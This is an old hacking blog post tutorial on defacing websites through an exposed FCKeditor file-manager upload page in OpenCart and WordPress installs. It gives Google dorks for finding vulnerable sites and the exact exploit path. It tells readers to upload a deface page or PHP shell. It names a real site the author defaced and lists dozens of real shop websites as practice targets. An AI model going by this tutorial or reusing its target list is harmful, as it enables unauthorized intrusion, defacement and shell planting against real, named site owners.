Tuesday, October 4, 2011

Wordpress fckeditor upload Vunerablity : Upload Your Deface Remotely

by Unknown


wordpress-bug-300x276.png (300×276)
This Method also Known as Open Cart OpenCart CMS (Web shop) Exploit, Its a old Vunerablity but many pepoles don't know this ... so i'm publishing here a tutorial here 

1- open Google.com and enter Dork:
inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
    or
    inurl:Powered By OpenCart


    http://www.schoolshopper.com.au/
    You'll Got a lot of websites by google, select anyone ... For Example i got this one 
    Then i'll will simply add the vuln URL after the website 

    http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
    Example


    (The path May be chnaged in other Website , Examplesite.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

    Now a Page will be open Like This 


    Now See The connector option which is on top left side on page, Change The Connector into PHP (see the Image below)















    and Now see file upload option and upload your deface or shell
    and for checking shell or deface check this url 
      www.site.com/deface.html
      or
      www.site.com/shell.php
    I have uploaded jaguar.html here so you can check http://www.schoolshopper.com.au/jaguar.html
    Mirror


    some demo for Practice (maybe some websites patched its my old collection so... )
    • http://ruthsgarden.com/
    • http://www.utahflowers.net/
    • http://www.eesnet.org/
    • http://bestonlinediscounts.net/
    • http://wenrestaurant.com/
    • http://ruthsgarden.com/
    • http://www.utahflowers.net/
    • http://www.inlove.my/
    • http://megamall.com.pk/
    • http://stefanyboutique.com/
    • http://www.virtualgeorge.info/
    • http://iphoneclone.biz/
    • http://amourcristallis.com/
    • http://www.eesnet.org/
    • http://www.schoolshopper.com.au/
    • http://www.mymaxi.nl/
    • http://wiretek.net/
    • http://shop.tjokgus.com/
    • http://www.aquariumsystem.it/
    • http://uae-shopper.com/
    • http://organicjewelries.com/
    • http://www.granmasantiques.com/
    • http://avocadogenie.com/
    • http://www.inputandanalysis.com
    • http://eddiegifts.com/
    • http://bestonlinediscounts.net/
    • http://wenrestaurant.com/
    • http://ruthsgarden.com/
    • http://www.utahflowers.net?/
    • http://www.inlove.my/
    • http://megamall.com.pk/
    • http://stefanyboutique.com?/
    • http://www.inputandanalysis.com/
    • http://www.virtualgeorge.info/
    • http://iphoneclone.biz/
    • http://amourcristallis.com?/
    • http://www.eesnet.org/
    • http://www.schoolshopper.com.au/
    • http://www.mymaxi.nl/
    • http://wiretek.net/
    • http://shop.tjokgus.com/
    • http://www.aquariumsystem.it/
    • http://uae-shopper.com/
    • http://organicjewelries.com/
    • http://www.granmasantiques.com/
    • http://avocadogenie.com/
    • http://www.inputandanalysis.com/
    • http://www.utahflowers.net/
    • http://stefanyboutique.com/
    • http://amourcristallis.com/

    • devilscafe.in owner Minhal Mehdi

    About Admin
    Hello Myself Avinash the owner of Hackerzadda.com. This is one stop solution site for all your tech and hack realted queries.You will find answer to all your web hack related quries here.

    0 comments:

    Post a Comment